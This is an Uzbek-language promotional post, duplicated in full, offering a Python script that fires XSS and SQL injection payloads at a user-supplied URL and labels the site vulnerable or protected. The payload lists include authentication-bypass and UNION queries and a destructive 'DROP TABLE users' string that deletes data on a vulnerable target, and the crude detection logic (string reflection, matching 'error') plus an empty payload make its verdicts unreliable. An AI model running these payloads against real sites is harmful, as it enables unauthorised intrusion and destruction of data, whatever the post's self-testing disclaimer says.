π‘ Veb-saytingizni XSS va SQL Injection zaifliklariga tekshiring !
Sizning veb-saytingiz hackerlar uchun oson nishon emasligiga aminmisiz? π€
Quyidagi Python skripti saytni XSS (Cross-Site Scripting) va SQL Injection zaifliklariga avtomatik ravishda tekshiradi !
βοΈ Kod qanday ishlaydi?
πΉ Saytga zararli XSS va SQL Injection kodlarini yuboradi.
πΉ Saytdan kelgan javobni tekshiradi.
πΉ Agar saytda zaiflik boβlsa, "β Topildi", himoyalangan boβlsa, "β Himoyalangan" deb chiqaradi.
π Dastur kodi:
import requests
# Foydalanuvchidan URL kiritishni so'rash
target_url = input("π Test qilinadigan sayt URL'ini kiriting (masalan, http://example.com/search.php?q=): ")
# XSS va SQL Injection payloadlari
xss_payloads = [
"alert('XSS')",
"\" onerror=\"alert('XSS')",
"",
"'; alert('XSS');'"
]
sql_payloads = [
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM users) > 0 --",
"' OR '1'='1' --",
"'; DROP TABLE users; --"
]
def test_xss():
print("\n[π] XSS zaifligini test qilish...")
for payload in xss_payloads:
response = requests.get(target_url + payload)
if payload in response.text:
print(f"[β] XSS topildi: {payload}")
else:
print(f"[β ] XSS himoyalangan: {payload}")
def test_sql_injection():
print("\n[π] SQL Injection zaifligini test qilish...")
for payload in sql_payloads:
response = requests.get(target_url + payload)
if "error" in response.text.lower() or "syntax" in response.text.lower():
print(f"[β] SQL Injection topildi: {payload}")
else:
print(f"[β ] SQL Injection himoyalangan: {payload}")
if __name__ == "__main__":
test_xss()
test_sql_injection()
π₯ Foydasi qanday ?
β Veb-saytingizni zaifliklarga tekshirib, hackerlar oldidan himoya qilishingiz mumkin!
β Bu vosita bepul va ochiq kodli!
β οΈ Muhim eslatma !
β Boshqalarning saytlarini ruxsatsiz skanerlash NOQONUNIY!
β Faqat oβz saytingizni tekshirish uchun ishlating!
π° Premium versiya + Qoβllab-quvvatlash β Kontaktga yozing π©
π Oβz saytingizni himoya qiling va xavfsiz boβling! π₯
Sizning veb-saytingiz hackerlar uchun oson nishon emasligiga aminmisiz? π€
Quyidagi Python skripti saytni XSS (Cross-Site Scripting) va SQL Injection zaifliklariga avtomatik ravishda tekshiradi !
βοΈ Kod qanday ishlaydi?
πΉ Saytga zararli XSS va SQL Injection kodlarini yuboradi.
πΉ Saytdan kelgan javobni tekshiradi.
πΉ Agar saytda zaiflik boβlsa, "β Topildi", himoyalangan boβlsa, "β Himoyalangan" deb chiqaradi.
π Dastur kodi:
import requests
# Foydalanuvchidan URL kiritishni so'rash
target_url = input("π Test qilinadigan sayt URL'ini kiriting (masalan, http://example.com/search.php?q=): ")
# XSS va SQL Injection payloadlari
xss_payloads = [
"alert('XSS')",
"\" onerror=\"alert('XSS')",
"",
"'; alert('XSS');'"
]
sql_payloads = [
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM users) > 0 --",
"' OR '1'='1' --",
"'; DROP TABLE users; --"
]
def test_xss():
print("\n[π] XSS zaifligini test qilish...")
for payload in xss_payloads:
response = requests.get(target_url + payload)
if payload in response.text:
print(f"[β] XSS topildi: {payload}")
else:
print(f"[β ] XSS himoyalangan: {payload}")
def test_sql_injection():
print("\n[π] SQL Injection zaifligini test qilish...")
for payload in sql_payloads:
response = requests.get(target_url + payload)
if "error" in response.text.lower() or "syntax" in response.text.lower():
print(f"[β] SQL Injection topildi: {payload}")
else:
print(f"[β ] SQL Injection himoyalangan: {payload}")
if __name__ == "__main__":
test_xss()
test_sql_injection()
π₯ Foydasi qanday ?
β Veb-saytingizni zaifliklarga tekshirib, hackerlar oldidan himoya qilishingiz mumkin!
β Bu vosita bepul va ochiq kodli!
β οΈ Muhim eslatma !
β Boshqalarning saytlarini ruxsatsiz skanerlash NOQONUNIY!
β Faqat oβz saytingizni tekshirish uchun ishlating!
π° Premium versiya + Qoβllab-quvvatlash β Kontaktga yozing π©
π Oβz saytingizni himoya qiling va xavfsiz boβling! π₯